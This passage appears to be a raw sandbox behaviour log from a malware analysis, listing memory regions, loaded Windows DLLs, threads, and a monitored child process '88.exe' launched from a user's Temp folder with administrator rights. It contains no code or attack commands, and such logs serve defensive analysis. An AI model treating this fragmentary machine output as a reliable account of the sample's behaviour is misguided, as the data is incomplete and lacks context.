monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4755 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4756 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4757 start_va = 0xffcd0000 end_va = 0xffcd6fff monitored = 0 entry_point = 0xffcd124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 4758 start_va = 0x7fef2610000 end_va = 0x7fef26affff monitored = 0 entry_point = 0x7fef268eb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4759 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 4760 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4761 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4762 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4763 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4764 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4765 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4766 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4767 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4768 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4769 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4770 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4771 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4772 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4773 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4774 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4775 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4776 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4777 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4778 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4779 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4780 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4781 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4782 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4783 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 4784 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4785 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4786 start_va = 0x7fffffda000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4787 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4788 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4789 start_va = 0x7fef84a0000 end_va = 0x7fef84b1fff monitored = 0 entry_point = 0x7fef84a101c region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 194 os_tid = 0xca4 Thread: id = 195 os_tid = 0xcac Thread: id = 196 os_tid = 0xca8 Thread: id = 197 os_tid = 0xca0 Thread: id = 198 os_tid = 0xc78 Thread: id = 199 os_tid = 0xc7c Thread: id = 200 os_tid = 0xc80 Process: id = "17" image_name = "88.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe" page_root = "0x665de000" os_pid = "0xc94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xec4" cmd_line = "\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4790 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4791 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4792 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4793 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4794 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4795 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4796 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4797 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x4031a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4798 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4799 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4800 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4801 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4802 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4803 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4804 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4805 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4806 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4807 start_va = 0x1c0000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4808 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4809 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4810 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4811 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4812 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4813 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4814 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 4815 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4816 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 4817 start_va = 0x240000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 4818 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4819 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4820 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4821 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4822 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4823 start_va = 0x350000 end_va = 0x3b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4824 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4825 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4826 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4827 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4828 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4829 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4830 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4831 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4832 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4833 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4834 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4835 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4836 start_va = 0x6bf40000 end_va = 0x6bfc3fff monitored = 0 entry_point = 0x6bf419a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 4840 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4841 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4842 start_va = 0x540000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4843 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4844 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4845 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4846 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4847 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4848 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4849 start_va = 0x6d0000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 4850 start_va = 0x860000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 4851 start_va = 0x1c60000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 4852 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4853 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4854 start_va = 0x6bf20000 end_va = 0x6bf36fff monitored = 0 entry_point = 0x6bf21c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 4855 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4856 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 4857 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4858 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4859 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 4860 start_va = 0x1b0000 end_va = 0x1bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 4861 start_va = 0x741f0000 end_va = 0x7423bfff monitored = 0 entry_point = 0x741f2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4867 start_va = 0x740a0000 end_va = 0x74194fff monitored = 0 entry_point = 0x740b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 4868 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4869 start_va = 0x74790000 end_va = 0x747cbfff monitored = 0 entry_point = 0x74793089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 4870 start_va = 0x240000 end_va = 0x240fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 4871 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 4872 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4873 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4874 start_va = 0x6bf10000 end_va = 0x6bf14fff monitored = 0 entry_point = 0x6bf111d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 4875 start_va = 0x440000 end_va = 0x51efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 4876 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4877 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 4878 start_va = 0x1e40000 end_va = 0x210efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4879 start_va = 0x1c60000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id = 4880 start_va = 0x1e30000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 4881 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 4882 start_va = 0x1c70000 end_va = 0x1c70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4883 start_va = 0x1c80000 end_va = 0x1c81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 4884 start_va = 0x1c90000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 4885 start_va = 0x1cd0000 end_va = 0x1dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 4886 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 4887 start_va = 0x1c70000 end_va = 0x1c70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 4888 start_va = 0x1dd0000 end_va = 0x1dd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 4889 start_va = 0x745b0000 end_va = 0x745d0fff monitored = 0 entry_point = 0x745b145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 4890 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 4919 start_va = 0x1de0000 end_va = 0x1de3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = 